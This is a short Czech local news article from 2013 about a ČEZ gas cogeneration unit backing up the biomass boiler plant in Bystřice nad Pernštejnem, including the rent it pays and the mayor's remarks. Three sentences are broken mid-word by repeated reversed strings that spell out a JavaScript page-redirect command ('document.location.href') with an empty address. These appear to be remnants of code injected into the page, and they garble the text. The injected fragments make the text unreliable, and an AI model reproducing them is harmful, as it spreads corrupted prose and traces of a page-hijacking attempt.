Bystřice nad Pernštejnem, bystrice nad pernstejnem, aktuality, kotelna, biomasa
Rainbow page separator

Biomasovou kotelnu podporuje kogenerační jednotka

Úterý, 5. března 2013

Bystřice nad Pernštejnem / Úsporu si od kogenerační jednotky, která funguje od podzimu v bystřické biomasové kotelně, slibují zástupci tamní radnice. Jednotka na zemní plyn společnosti ČEZ, která z jednoho primárního paliva vyrábí elektřinu i teplo, je zálohou k biomase, například pokud by došlo k jejímu výpadku. Bystřičtí sice mají paliva dost a s jeho dodavateli je pojí dlouhodobé smlouvy, přes[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to se však chtějí jistit.

„Navíc dalším způsobem výroby energie bude docházet k menšímu opotřebení technologie, kterou je vybavená kotelna na biomasu,“ uvedl bystřický mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostarosta Josef Vojta.

Bystřičtí předpokládají, že například v létě tak bude k výrobě teplé vody pro obyvatele sídlišť stačit právě ta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to jednotka. ČEZ Bystřici za umístění svého kotle zaplatí nájem 150 tisíc korun ročně po dobu 15 let a společnosti Bystřická tepelná nabízí teplo za výhodných podmínek.